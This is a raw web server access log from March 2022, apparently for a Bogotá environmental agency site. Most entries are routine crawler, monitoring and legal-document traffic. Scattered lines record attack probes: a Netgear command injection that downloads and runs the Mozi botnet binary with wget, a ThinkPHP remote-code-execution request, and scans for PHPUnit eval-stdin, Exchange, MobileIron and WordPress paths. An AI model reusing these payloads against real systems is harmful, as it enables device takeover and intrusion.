173.231.60.194 - - [29/Mar/2022:01:51:57 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%201401%20-%201500%2F&sort=size&order=asc HTTP/1.1" 200 13545
173.231.60.194 - - [29/Mar/2022:01:52:04 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%201501%20-%201600%2F&sort=date&order=asc HTTP/1.1" 200 22232
173.231.60.194 - - [29/Mar/2022:01:52:10 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%201501%20-%201600%2F&sort=size&order=asc HTTP/1.1" 200 22232
172.22.2.4 - - [29/Mar/2022:01:52:15 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 1018
173.231.60.194 - - [29/Mar/2022:01:52:18 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%201601%20-%201700%2F&sort=date&order=asc HTTP/1.1" 200 22248
201.245.192.253 - - [29/Mar/2022:01:51:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 75839
173.231.60.194 - - [29/Mar/2022:01:52:27 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%201601%20-%201700%2F&sort=size&order=asc HTTP/1.1" 200 22248
172.22.2.4 - - [29/Mar/2022:01:50:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59688
207.46.13.209 - - [29/Mar/2022:01:53:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4272.pdf HTTP/1.1" 200 372830
172.22.2.4 - - [29/Mar/2022:01:54:52 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/cuadro%20sentencia%20c-222%20de%202011.doc HTTP/1.1" 200 34816
216.245.221.92 - - [29/Mar/2022:01:56:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:01:55:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:01:56:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [29/Mar/2022:02:01:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:02:02:59 -0500] "GET /BLA/boletinlegal/circulares/2012/circular%20no.%203%20del%2023%20de%20marzo%20de%202012.pdf HTTP/1.1" 200 572950
172.22.2.4 - - [29/Mar/2022:02:01:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:02:02:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 75839
172.22.2.4 - - [29/Mar/2022:02:02:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52945
199.16.157.180 - - [29/Mar/2022:02:05:05 -0500] "-" 408 -
216.245.221.92 - - [29/Mar/2022:02:06:10 -0500] "HEAD / HTTP/1.1" 200 -
34.147.119.179 - - [29/Mar/2022:02:07:03 -0500] "GET / HTTP/1.1" 200 319
199.16.157.180 - - [29/Mar/2022:02:07:36 -0500] "GET /images/pot-humedales-2-octubre.jpg HTTP/1.1" 200 53089
199.16.157.180 - - [29/Mar/2022:02:07:36 -0500] "GET /images/pot-humedales-2-octubre.jpg HTTP/1.1" 200 53089
172.22.2.4 - - [29/Mar/2022:02:07:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:02:08:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58006
216.245.221.92 - - [29/Mar/2022:02:11:10 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:02:11:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 75835
172.22.2.4 - - [29/Mar/2022:02:12:43 -0500] "GET /BLA/boletinlegal/directivas/2018/directiva%20no.%2025%20del%2027%20de%20diciembre%20de%202018.pdf HTTP/1.1" 200 1351319
172.22.2.4 - - [29/Mar/2022:02:13:45 -0500] "GET /BLA/boletinlegal/directivas/2011/directiva%20no.%206%20del%208%20de%20septiembre%20de%202011.pdf HTTP/1.1" 200 996625
172.22.2.4 - - [29/Mar/2022:02:13:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.107.7 - - [29/Mar/2022:02:15:41 -0500] "GET /images/culebra-sabanera-bogota-26-marzo.jpg HTTP/1.1" 200 22555
40.77.167.46 - - [29/Mar/2022:02:15:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/2454.pdf HTTP/1.1" 200 279758
172.22.2.4 - - [29/Mar/2022:02:14:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [29/Mar/2022:02:16:10 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.4 - - [29/Mar/2022:02:17:03 -0500] "GET /residuos-hospitalarios-secretaria-de-ambiente-participo-en-operativo-en-centros-de-estetica-y-peluquerias-de-teusaquillo.html HTTP/1.1" 206 1037
172.22.2.4 - - [29/Mar/2022:02:19:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [29/Mar/2022:02:21:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:02:21:15 -0500] "GET /BLA/boletinlegal/circulares/2011/circular%20no.%206%20del%2029%20de%20julio%20de%202011.pdf HTTP/1.1" 200 262144
201.245.192.253 - - [29/Mar/2022:02:20:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45454
172.22.2.4 - - [29/Mar/2022:02:20:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56300
172.22.2.4 - - [29/Mar/2022:02:21:45 -0500] "GET /BLA/boletinlegal/circulares/2013/circular%20no.%207%20del%201%20de%20agosto%20de%202013.pdf HTTP/1.1" 200 340934
201.245.192.253 - - [29/Mar/2022:02:21:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29664
201.245.192.253 - - [29/Mar/2022:02:21:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 75835
66.248.204.92 - - [29/Mar/2022:02:25:36 -0500] "GET /images/culebra-sabanera-bogota-26-marzo.jpg HTTP/1.1" 200 22555
66.248.204.11 - - [29/Mar/2022:02:25:42 -0500] "GET /images/operativos-control-residuos-hospitalarios-28-marzo.jpg HTTP/1.1" 200 36883
216.245.221.92 - - [29/Mar/2022:02:26:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:02:25:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.100 - - [29/Mar/2022:02:27:17 -0500] "-" 408 -
172.22.2.4 - - [29/Mar/2022:02:25:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55089
172.22.2.4 - - [29/Mar/2022:02:28:02 -0500] "GET /BLA/boletinlegal/circulares/2020/circular%20no.%2000014%20del%2001%20de%20septiembre%20del%202020.pdf HTTP/1.1" 200 320826
120.86.255.86 - - [29/Mar/2022:02:29:53 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
172.22.2.4 - - [29/Mar/2022:02:30:24 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/SENTENCIA%20C-703%20DE%202010.xls HTTP/1.1" 304 -
216.245.221.92 - - [29/Mar/2022:02:31:10 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:02:30:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45454
201.245.192.253 - - [29/Mar/2022:02:31:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29664
172.22.2.4 - - [29/Mar/2022:02:32:16 -0500] "GET /BLA/boletinlegal/circulares/2015/circular%20no.%202%20del%201%20de%20julio%20de%202015.pdf HTTP/1.1" 200 752890
172.22.2.4 - - [29/Mar/2022:02:30:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:02:31:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 75835
172.22.2.4 - - [29/Mar/2022:02:31:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
20.36.244.102 - - [29/Mar/2022:02:33:04 -0500] "GET /noticias/rssambiente.php HTTP/1.1" 406 -
66.249.73.97 - - [29/Mar/2022:02:35:54 -0500] "-" 408 -
216.245.221.92 - - [29/Mar/2022:02:36:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:02:36:48 -0500] "GET /BLA/boletinlegal/directivas/2017/directiva%20no.%2005%20del%2013%20de%20junio%20de%202017.pdf HTTP/1.1" 200 853105
172.22.2.4 - - [29/Mar/2022:02:36:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:02:37:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54457
216.245.221.92 - - [29/Mar/2022:02:41:10 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:02:40:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45454
201.245.192.253 - - [29/Mar/2022:02:41:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43058
201.245.192.253 - - [29/Mar/2022:02:41:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109398
172.22.2.4 - - [29/Mar/2022:02:42:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:02:43:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [29/Mar/2022:02:46:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:02:46:46 -0500] "GET /BLA/boletinlegal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [29/Mar/2022:02:48:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:02:49:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [29/Mar/2022:02:51:10 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [29/Mar/2022:02:51:42 -0500] "-" 408 -
201.245.192.253 - - [29/Mar/2022:02:51:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109398
172.22.2.4 - - [29/Mar/2022:02:54:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [29/Mar/2022:02:56:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:02:55:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57044
207.46.13.209 - - [29/Mar/2022:02:57:41 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [29/Mar/2022:03:01:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:03:00:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
37.101.176.17 - - [29/Mar/2022:03:02:10 -0500] "HEAD /residuos-hospitalarios-secretaria-de-ambiente-participo-en-operativo-en-centros-de-estetica-y-peluquerias-de-teusaquillo.html HTTP/1.1" 200 -
103.14.251.15 - - [29/Mar/2022:03:02:12 -0500] "HEAD /en-epoca-de-lluvias-algunos-animales-silvestres-pueden-ser-mas-visibles-en-zonas-de-la-ciudad-cuidalos.html HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:03:00:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
201.245.192.253 - - [29/Mar/2022:03:01:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109398
217.182.175.162 - - [29/Mar/2022:03:05:15 -0500] "HEAD /residuos-hospitalarios-secretaria-de-ambiente-participo-en-operativo-en-centros-de-estetica-y-peluquerias-de-teusaquillo.html HTTP/1.1" 200 -
217.182.175.162 - - [29/Mar/2022:03:05:15 -0500] "HEAD /en-epoca-de-lluvias-algunos-animales-silvestres-pueden-ser-mas-visibles-en-zonas-de-la-ciudad-cuidalos.html HTTP/1.1" 200 -
216.245.221.92 - - [29/Mar/2022:03:06:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:03:05:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.231.60.198 - - [29/Mar/2022:03:07:41 -0500] "-" 408 -
172.22.2.4 - - [29/Mar/2022:03:06:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
173.231.60.197 - - [29/Mar/2022:03:09:13 -0500] "-" 408 -
173.231.60.195 - - [29/Mar/2022:03:09:32 -0500] "-" 408 -
173.231.60.198 - - [29/Mar/2022:03:09:42 -0500] "-" 408 -
151.48.217.86 - - [29/Mar/2022:03:09:47 -0500] "GET /catalogoisis/ HTTP/1.1" 404 211
151.48.217.86 - - [29/Mar/2022:03:09:47 -0500] "GET /catalogoisis/ HTTP/1.1" 404 211
173.231.60.196 - - [29/Mar/2022:03:10:56 -0500] "-" 408 -
216.245.221.92 - - [29/Mar/2022:03:11:10 -0500] "HEAD / HTTP/1.1" 200 -
173.231.60.197 - - [29/Mar/2022:03:11:13 -0500] "-" 408 -
173.231.60.195 - - [29/Mar/2022:03:11:32 -0500] "-" 408 -
173.231.60.196 - - [29/Mar/2022:03:12:56 -0500] "-" 408 -
172.22.2.4 - - [29/Mar/2022:03:11:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:03:13:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109401
172.22.2.4 - - [29/Mar/2022:03:12:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
157.55.39.23 - - [29/Mar/2022:03:14:35 -0500] "-" 408 -
216.245.221.92 - - [29/Mar/2022:03:16:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:03:16:58 -0500] "GET /BLA/boletinlegal/directivas/2013/directiva%20no.%202%20del%2004%20de%20abril%20de%202013.pdf HTTP/1.1" 200 1182671
172.22.2.4 - - [29/Mar/2022:03:17:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.97 - - [29/Mar/2022:03:19:36 -0500] "-" 408 -
172.22.2.4 - - [29/Mar/2022:03:18:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53344
157.55.39.177 - - [29/Mar/2022:03:21:09 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [29/Mar/2022:03:21:10 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:03:20:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45461
201.245.192.253 - - [29/Mar/2022:03:21:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43061
201.245.192.253 - - [29/Mar/2022:03:21:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109401
172.22.2.4 - - [29/Mar/2022:03:23:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:03:24:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
207.46.13.157 - - [29/Mar/2022:03:26:00 -0500] "GET /BLA/resoluciones/AUTOS%202020/3636.pdf HTTP/1.1" 200 364150
216.245.221.92 - - [29/Mar/2022:03:26:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:03:28:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56300
172.22.2.4 - - [29/Mar/2022:03:30:48 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000003%20DEL%2007%20DE%20MARZO%20DEL%202022.pdf HTTP/1.1" 404 1038
172.22.2.4 - - [29/Mar/2022:03:29:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [29/Mar/2022:03:31:10 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:03:30:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45461
172.22.2.4 - - [29/Mar/2022:03:31:27 -0500] "GET /BLA/boletinlegal/directivas/2016/directiva%20no.%2002%20del%2019%20de%20abril%20de%202016.pdf HTTP/1.1" 200 11898321
172.22.2.4 - - [29/Mar/2022:03:30:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59688
201.245.192.253 - - [29/Mar/2022:03:31:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43061
201.245.192.253 - - [29/Mar/2022:03:31:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109401
66.249.73.127 - - [29/Mar/2022:03:33:57 -0500] "-" 408 -
216.245.221.92 - - [29/Mar/2022:03:36:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:03:35:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:03:35:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54090
66.249.73.127 - - [29/Mar/2022:03:39:41 -0500] "-" 408 -
40.77.167.46 - - [29/Mar/2022:03:40:09 -0500] "GET /Autoliquidacion/Solicitud%20de%20Licencia%20Ambiental/Aplicativo.html HTTP/1.1" 304 -
216.245.221.92 - - [29/Mar/2022:03:41:10 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:03:40:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45461
201.245.192.253 - - [29/Mar/2022:03:41:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43061
172.22.2.4 - - [29/Mar/2022:03:41:37 -0500] "GET /BLA/boletinlegal/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 32715
172.22.2.4 - - [29/Mar/2022:03:40:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:03:42:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109401
172.22.2.4 - - [29/Mar/2022:03:41:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57044
66.249.73.127 - - [29/Mar/2022:03:45:50 -0500] "-" 408 -
216.245.221.92 - - [29/Mar/2022:03:46:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:03:46:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:03:47:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
216.245.221.92 - - [29/Mar/2022:03:51:10 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:03:51:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109401
54.39.177.173 - - [29/Mar/2022:03:54:05 -0500] "GET /residuos-hospitalarios-secretaria-de-ambiente-participo-en-operativo-en-centros-de-estetica-y-peluquerias-de-teusaquillo.html HTTP/1.1" 200 1037
54.39.177.48 - - [29/Mar/2022:03:54:05 -0500] "GET /en-epoca-de-lluvias-algunos-animales-silvestres-pueden-ser-mas-visibles-en-zonas-de-la-ciudad-cuidalos.html HTTP/1.1" 200 976
172.22.2.4 - - [29/Mar/2022:03:52:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:03:53:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
216.245.221.92 - - [29/Mar/2022:03:56:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:03:57:45 -0500] "GET /BLA/boletinlegal/directivas/2011/directiva%20no.%201%20del%205%20de%20abril%20de%202011.pdf HTTP/1.1" 200 971292
172.22.2.4 - - [29/Mar/2022:03:58:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [29/Mar/2022:04:00:21 -0500] "-" 408 -
172.22.2.4 - - [29/Mar/2022:03:59:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [29/Mar/2022:04:01:10 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:04:01:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109401
172.22.2.4 - - [29/Mar/2022:04:04:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [29/Mar/2022:04:06:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:04:05:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55877
157.55.39.52 - - [29/Mar/2022:04:07:24 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%201%20del%2023%20de%20Febrero%20de%202011.pdf HTTP/1.1" 304 -
66.249.73.127 - - [29/Mar/2022:04:09:43 -0500] "-" 408 -
216.245.221.92 - - [29/Mar/2022:04:11:10 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.43 - - [29/Mar/2022:04:11:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/4484.pdf HTTP/1.1" 200 353286
172.22.2.4 - - [29/Mar/2022:04:10:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
64.31.8.158 - - [29/Mar/2022:04:12:12 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [29/Mar/2022:04:10:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
201.245.192.253 - - [29/Mar/2022:04:12:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109401
216.245.221.92 - - [29/Mar/2022:04:16:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:04:15:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:04:17:46 -0500] "GET /BLA/boletinlegal/directivas/2012/directiva%20no.%201%20del%2030%20de%20octubre%20de%202012.pdf HTTP/1.1" 200 1522771
172.22.2.4 - - [29/Mar/2022:04:16:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54090
139.162.215.70 - - [29/Mar/2022:04:18:50 -0500] "GET / HTTP/1.1" 200 319
66.249.73.127 - - [29/Mar/2022:04:20:29 -0500] "-" 408 -
172.22.2.4 - - [29/Mar/2022:04:21:09 -0500] "GET /BLA/boletinlegal/sugerencias.php HTTP/1.1" 200 8615
216.245.221.92 - - [29/Mar/2022:04:21:10 -0500] "HEAD / HTTP/1.1" 200 -
34.91.172.235 - - [29/Mar/2022:04:21:23 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [29/Mar/2022:04:20:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45441
201.245.192.253 - - [29/Mar/2022:04:21:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43061
201.245.192.253 - - [29/Mar/2022:04:22:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109401
172.22.2.4 - - [29/Mar/2022:04:21:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:04:22:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54090
216.245.221.92 - - [29/Mar/2022:04:26:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:04:25:41 -0500] "GET /BLA/boletinlegal/?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 32715
173.252.107.16 - - [29/Mar/2022:04:27:27 -0500] "GET /images/jornada-llantaton-usaquen-bosa-25-marzo.jpg HTTP/1.1" 200 60391
172.22.2.4 - - [29/Mar/2022:04:28:52 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisist-693-12.docx HTTP/1.1" 200 25737
172.22.2.4 - - [29/Mar/2022:04:27:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:04:28:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
216.245.221.92 - - [29/Mar/2022:04:31:10 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:04:30:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45441
172.22.2.4 - - [29/Mar/2022:04:31:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [29/Mar/2022:04:31:36 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9555
61.143.40.50 - - [29/Mar/2022:04:31:38 -0500] "GET /portaldeninos/ HTTP/1.1" 200 102040
201.245.192.253 - - [29/Mar/2022:04:31:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43061
201.245.192.253 - - [29/Mar/2022:04:31:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109401
172.22.2.4 - - [29/Mar/2022:04:33:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:04:34:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [29/Mar/2022:04:36:09 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [29/Mar/2022:04:36:36 -0500] "-" 408 -
69.171.251.19 - - [29/Mar/2022:04:37:13 -0500] "GET /en-epoca-de-lluvias-algunos-animales-silvestres-pueden-ser-mas-visibles-en-zonas-de-la-ciudad-cuidalos.html HTTP/1.1" 206 976
172.22.2.4 - - [29/Mar/2022:04:39:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [29/Mar/2022:04:41:09 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:04:40:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45441
172.22.2.4 - - [29/Mar/2022:04:40:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
201.245.192.253 - - [29/Mar/2022:04:41:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43061
172.22.2.4 - - [29/Mar/2022:04:42:17 -0500] "GET /BLA/boletinlegal/directivas/2017/directiva%20no.%2002%20del%2017%20de%20enero%20de%202017.pdf HTTP/1.1" 200 3521427
201.245.192.253 - - [29/Mar/2022:04:42:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109401
172.22.2.4 - - [29/Mar/2022:04:44:10 -0500] "GET /BLA/boletinlegal/a2billing/customer/templates/default/footer.tpl HTTP/1.1" 404 1018
172.22.2.4 - - [29/Mar/2022:04:45:31 -0500] "POST /BLA/boletinlegal/mifs/.;/services/LogService HTTP/1.1" 404 1158
173.252.107.22 - - [29/Mar/2022:04:46:08 -0500] "GET /se-abre-convocatoria-a-organizaciones-ambientales-para-generar-1-070-empleos-verdes-dirigidos-a-mujeres.html HTTP/1.1" 206 1128
216.245.221.92 - - [29/Mar/2022:04:46:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:04:45:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:04:45:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60105
207.46.13.209 - - [29/Mar/2022:04:47:51 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [29/Mar/2022:04:50:17 -0500] "GET /BLA/boletinlegal/directivas/2017/directiva%20no.%2001%20del%2017%20de%20enero%20de%202017.pdf HTTP/1.1" 200 2804310
216.245.221.92 - - [29/Mar/2022:04:51:09 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [29/Mar/2022:04:51:30 -0500] "-" 408 -
207.46.13.209 - - [29/Mar/2022:04:52:01 -0500] "GET /bla/resoluciones/resoluciones%202019/1007.pdf HTTP/1.1" 200 242101
172.22.2.4 - - [29/Mar/2022:04:50:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:04:51:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109401
172.22.2.4 - - [29/Mar/2022:04:51:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55089
157.55.39.218 - - [29/Mar/2022:04:53:58 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 299310
207.46.13.43 - - [29/Mar/2022:04:55:15 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12500
216.245.221.92 - - [29/Mar/2022:04:56:09 -0500] "HEAD / HTTP/1.1" 200 -
154.16.105.39 - - [29/Mar/2022:04:58:19 -0500] "GET /wp-login.php HTTP/1.1" 404 1035
